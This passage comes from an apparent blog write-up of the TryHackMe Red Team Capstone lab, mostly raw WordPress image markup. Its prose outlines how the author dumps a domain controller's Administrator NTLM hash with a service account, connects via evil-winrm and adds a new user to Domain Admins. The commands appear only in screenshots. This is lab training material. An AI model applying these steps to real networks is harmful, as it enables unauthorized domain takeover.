data-image-title=\"Pasted-image-20240206173005\" data-image-description=\"\" 
data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173005.png?fit=869%2C141&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173005.png?resize=869%2C141&#038;ssl=1\" alt=\"\" class=\"wp-image-499\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173005.png?w=869&amp;ssl=1 869w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173005.png?resize=300%2C49&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173005.png?resize=768%2C125&amp;ssl=1 768w\" sizes=\"auto, (max-width: 869px) 100vw, 869px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>Performing the same 
technique won\u2019t work on the CORPDC machine with the svcScanning account.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091149ee&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091149ee\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"364\" data-attachment-id=\"500\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206173229\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173229.png?fit=1701%2C605&amp;ssl=1\" data-orig-size=\"1701,605\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206173229\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173229.png?fit=1024%2C364&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173229.png?resize=1024%2C364&#038;ssl=1\" alt=\"\" class=\"wp-image-500\" 
srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173229.png?resize=1024%2C364&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173229.png?resize=300%2C107&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173229.png?resize=768%2C273&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173229.png?resize=1536%2C546&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173229.png?w=1701&amp;ssl=1 1701w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>To perform the same technique and dump secrets from the CORPDC machine, we will use the <code>svcBackups<\/code> account.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09115095&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09115095\" class=\"wp-block-image size-large 
wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"430\" data-attachment-id=\"501\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206173631\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173631.png?fit=1692%2C710&amp;ssl=1\" data-orig-size=\"1692,710\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206173631\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173631.png?fit=1024%2C430&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173631.png?resize=1024%2C430&#038;ssl=1\" alt=\"\" class=\"wp-image-501\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173631.png?resize=1024%2C430&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173631.png?resize=300%2C126&amp;ssl=1 300w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173631.png?resize=768%2C322&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173631.png?resize=1536%2C645&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173631.png?w=1692&amp;ssl=1 1692w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>This worked out perfectly fine for us and we now have the NTLM hash for the Administrator user for the <code>CORPDC<\/code> machine! This is a big achievement. Having the Administrator&#8217;s hash, we can connect to the CORPDC machine via RDP or using <code>Winrm<\/code>. 
We can also try to crack the hash offline and find out the password for the Administrator.<\/p>\n\n\n\n<p>When trying to RDP we get a message that the account is not allowed to log in without a password or with a blank password.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09115859&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09115859\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"560\" data-attachment-id=\"503\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206174801\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206174801.png?fit=1641%2C897&amp;ssl=1\" data-orig-size=\"1641,897\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206174801\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206174801.png?fit=1024%2C560&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" 
src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206174801.png?resize=1024%2C560&#038;ssl=1\" alt=\"\" class=\"wp-image-503\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206174801.png?resize=1024%2C560&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206174801.png?resize=300%2C164&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206174801.png?resize=768%2C420&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206174801.png?resize=1536%2C840&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206174801.png?w=1641&amp;ssl=1 1641w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We will need a password for the administrator to connect via RDP. Hashcat was not able to crack the hash. 
Our next option is to connect using <code>evil-winrm<\/code>.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09115ff6&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09115ff6\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"357\" data-attachment-id=\"504\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206173933\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173933.png?fit=1685%2C587&amp;ssl=1\" data-orig-size=\"1685,587\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206173933\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173933.png?fit=1024%2C357&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173933.png?resize=1024%2C357&#038;ssl=1\" alt=\"\" class=\"wp-image-504\" 
srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173933.png?resize=1024%2C357&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173933.png?resize=300%2C105&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173933.png?resize=768%2C268&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173933.png?resize=1536%2C535&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206173933.png?w=1685&amp;ssl=1 1685w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>To get RDP access, we can create a new user as an Administrator.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>Changing the Administrator password is not recommend as this will not be a preferable option in real world pentest assignments.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:11px\" 
aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>First, let&#8217;s create a user.<\/p>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09116748&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09116748\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"88\" data-attachment-id=\"505\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240208194436\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194436.png?fit=1638%2C141&amp;ssl=1\" data-orig-size=\"1638,141\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240208194436\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194436.png?fit=1024%2C88&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194436.png?resize=1024%2C88&#038;ssl=1\" alt=\"\" class=\"wp-image-505\" 
srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194436.png?resize=1024%2C88&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194436.png?resize=300%2C26&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194436.png?resize=768%2C66&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194436.png?resize=1536%2C132&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194436.png?w=1638&amp;ssl=1 1638w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Next, we will enumerate the groups to find the group name for the Administrator user.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09116d9c&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09116d9c\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" 
loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"704\" data-attachment-id=\"506\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240208194519\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194519.png?fit=1388%2C954&amp;ssl=1\" data-orig-size=\"1388,954\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240208194519\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194519.png?fit=1024%2C704&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194519.png?resize=1024%2C704&#038;ssl=1\" alt=\"\" class=\"wp-image-506\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194519.png?resize=1024%2C704&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194519.png?resize=300%2C206&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194519.png?resize=768%2C528&amp;ssl=1 768w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194519.png?w=1388&amp;ssl=1 1388w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Finally, we will add our user to this group to make him the <code>Domain Admin<\/code>.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09117545&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09117545\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"692\" data-attachment-id=\"507\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240208194558\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208194558.png?fit=1543%2C1042&amp;ssl=1\" data-orig-size=\"1543,1042\" data-comments-opened=\"1\" 
